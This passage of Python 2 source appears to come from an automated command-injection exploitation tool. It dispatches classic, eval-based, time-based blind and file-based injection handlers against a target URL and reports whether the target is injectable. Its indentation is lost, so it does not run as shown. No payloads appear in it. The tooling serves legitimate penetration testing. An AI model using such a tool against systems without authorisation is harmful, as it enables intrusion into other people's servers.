modules_handler.load_modules(url, http_request_method, filename)
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
else:
logs.logs_notification(filename)
sys.exit(0)
#eof